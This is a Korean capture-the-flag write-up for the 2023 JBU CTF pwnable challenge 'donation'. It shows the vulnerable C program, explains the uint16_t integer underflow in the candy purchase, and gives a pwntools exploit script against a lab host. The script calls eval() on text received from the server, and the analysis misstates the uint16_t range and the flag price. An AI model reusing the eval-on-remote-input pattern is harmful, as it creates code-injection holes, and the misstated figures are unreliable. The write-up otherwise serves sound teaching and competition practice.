[2023 JBU CTF] donation write-up

분야 : Pwnable

💡 2023 JBU CTF에서 출제한 문제에 대한 write-up이다.

🧐 문제

문제명 : donation

캔디를 구매할 때 정수 언더플로우가 발생함을 인지하고, 이를 통해 플래그를 구매하는 문제이다.

 

위 구성이 문제파일로 제공된다. 로컬에서 도커 컨테이너를 올려 익스플로잇을 진행하고, 동일한 페이로드를 서버에 전송하면 실제 문제 플래그를 획득할 수 있다. 이 문제는 c파일이 제공된다.

 

 

donation.c

#include <stdio.h>
#include <stdlib.h>
#include <time.h>
#include <stdint.h>

uint16_t your_money = 0;
uint16_t dona_money = 0;

void get_flag()
{
    FILE *f = fopen("/home/UF/flag", "r");
    char buf[256];
    if (f == NULL)
    {
        puts("flag.txt not found - call SCP member\n");
        exit(0);
    }
    else
    {
        fgets(buf, sizeof(buf), f);
        printf("%s\n", buf);
        exit(0);
    }
}

void menu()
{
    printf("======MENU======\n");
    printf("1. check money\n");
    printf("2. donate money\n");
    printf("3. make money\n");
    printf("4. shop\n");
    printf("================\n");
}

void shop_menu()
{
    printf("======MENU======\n");
    printf("1. buy flag\n");
    printf("2. buy candy\n");
    printf("3. return to menu\n");
    printf("================\n");
}

void donate_menu()
{
    printf("======MENU======\n");
    printf("1. Total donation amount\n");
    printf("2. Donate my money\n");
    printf("3. return to menu\n");
    printf("================\n");
}

void shop()
{
    int choice;
    while (1)
    {
        shop_menu();
        scanf("%d", &choice);

        switch (choice)
        {
        case 1:
            if (your_money >= 65530)
            {
                your_money -= 65530;
                printf("Purchase completed. Please come again. ~_~\n");
                get_flag();
            }
            else
            {
                printf("The flag is 65,530 won. You have no money!!\n");
            }
            break;
        case 2:
            your_money -= 300;
            dona_money += 300;
            printf("you bought candy!\n");
            break;
        case 3:
            return;
        }
    }
}

int problem()
{
    srand(time(NULL));

    int num1 = rand() % 9999 + 1;
    int num2 = rand() % 9999 + 1;
    int operator= rand() % 4;
    float answer = 0.0;

    switch (operator)
    {
    case 0:
        answer = num1 + num2;
        printf("%d + %d = ?\n", num1, num2);
        break;
    case 1:
        answer = num1 - num2;
        printf("%d - %d = ?\n", num1, num2);
        break;
    case 2:
        answer = num1 * num2;
        printf(" %d * %d = ?\n", num1, num2);
        break;
    case 3:
        answer = (float)num1 / num2;
        printf("%d / %d = ?\n", num1, num2);
        break;
    }

    float userAnswer;
    printf("Input answer: ");
    scanf("%f", &userAnswer);

    if (userAnswer == answer)
        return 1;
    else
        return 0;
}

void work()
{
    int answer;
    answer = problem();
    if (answer == 1 && your_money < 65500)
    {
        printf("correct. you get 10 won\n");
        your_money += 10;
    }
    else
    {
        printf("Incorrect.\n");
    }
}

void check()
{
    printf("There is %d won in your wallet.\n", your_money);
}

void donate()
{
    int choice;
    uint16_t input_money;

    donate_menu();
    scanf("%d", &choice);

    switch (choice)
    {
    case 1:
        printf("Total donate money is %d won.\n", dona_money);
        break;
    case 2:
        printf("How much are you going to donate?\n");
        scanf("%hd", &input_money);
        if (your_money < input_money)
        {
            printf("You don't have enough money to donate the money. Get out of here right now!!!!!\n");
            exit(-1);
        }
        your_money -= input_money;
        dona_money += input_money;
        printf("%d won has been donated.\n", input_money);
        break;
    case 3:
        return;
    }
}

int main()
{
    int choice;
    setvbuf(stdin, NULL, _IONBF, 0);
    setvbuf(stdout, NULL, _IONBF, 0);
    printf("Hello!, There is %d won in your wallet.\n", your_money);
    while (1)
    {
        menu();
        scanf("%d", &choice);
        switch (choice)
        {
        case 1:
            check();
            break;
        case 2:
            donate();
            break;
        case 3:
            work();
            break;
        case 4:
            shop();
            break;
        }
    }
    return 0;
}

코드가 실행되면 나의 지갑과 기부금이 열리며, 함수들을 통해 기부를 하거나, 돈을 벌거나, 물건을 구매할 수 있게 된다. 해당 함수들을 이용하여 플래그를 구매하는 문제이다.

 

 

🧐 분석

uint16_t your_money = 0;
uint16_t dona_money = 0;

void shop()
{
    int choice;
    while (1)
    {
        shop_menu();
        scanf("%d", &choice);

        switch (choice)
        {
        case 1:
            if (your_money >= 65530)
            {
                your_money -= 65530;
                printf("Purchase completed. Please come again. ~_~\n");
                get_flag();
            }
            else
            {
                printf("The flag is 65,530 won. You have no money!!\n");
            }
            break;
        case 2:
            your_money -= 300;
            dona_money += 300;
            printf("you bought candy!\n");
            break;
        case 3:
            return;
        }
    }
}

먼저, 전역변수로 your_money와 dona_money가 초기화된다. 이 두 변수의 자료형은 uint16_t이다.

그리고 shop함수의 case 2에서 **your_money -= 300;**에서 정수 언더플로우가 발생한다.

따라서, uint16_t의 범위는 0~65536이기 때문에, 0 - 300을 하면 65236이 된다.

플래그를 구매하기 위해서는 65300원이 있어야 하고, 이는 work함수와 donation함수로 값을 맞춰줄 수 있다.

 

 

void work()
{
    int answer;
    answer = problem();
    if (answer == 1 && your_money < 65500)
    {
        printf("correct. you get 10 won\n");
        your_money += 10;
    }
    else
    {
        printf("Incorrect.\n");
    }
}

void donate()
{
    int choice;
    uint16_t input_money;

    donate_menu();
    scanf("%d", &choice);

    switch (choice)
    {
    case 1:
        printf("Total donate money is %d won.\n", dona_money);
        break;
    case 2:
        printf("How much are you going to donate?\n");
        scanf("%hd", &input_money);
        if (your_money < input_money)
        {
            printf("You don't have enough money to donate the money. Get out of here right now!!!!!\n");
            exit(-1);
        }
        your_money -= input_money;
        dona_money += input_money;
        printf("%d won has been donated.\n", input_money);
        break;
    case 3:
        return;
    }
}

work함수는 65500원까지만 돈을 벌 수 있으므로, 캔디의 가격인 300원을 미리 생각해서 값을 구성해야한다. 또한, donation함수를 사용해야 65530~65535 사이에 값을 구성할 수 있다.

각각의 함수 특징을 이해하고, 언더플로우 시 값을 계산해서 순서에 맞게 호출해주면 플래그를 구매할 수 있다.

 

 

🧐 익스플로잇

from pwn import *

#p = process('./donation')
p = remote('192.168.83.137',13572)

def work():
    p.sendlineafter('================\n',str(3))
    line = p.recvline()
    numbers = re.findall(r'\d+', str(line))
    operators = re.findall(r'[-+*/]', str(line))
    result = eval(numbers[0]+operators[0]+numbers[1])
    p.sendline(str(result))
    p.recvuntil(b'\n')

def donate(money):
    p.sendlineafter('================\n',str(2))
    p.sendlineafter('================\n',str(2))
    p.sendlineafter('How much are you going to donate?', str(money))

def buy_candy():
    p.sendlineafter('================\n',str(4))
    p.sendlineafter('================\n',str(2))
    p.sendlineafter('================\n',str(3))
def get_flag():
    p.sendlineafter('================\n',str(4))
    p.sendlineafter('================\n',str(1))

for i in range(30):
    work()
donate(1)
buy_candy()
get_flag()

p.interactive()

해당 exploit 코드를 실행하면 플래그를 얻을 수 있다.